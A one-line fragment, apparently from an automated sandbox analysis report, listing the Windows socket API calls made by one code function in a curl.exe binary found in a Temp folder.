Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0084DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 33_2_0084DEDF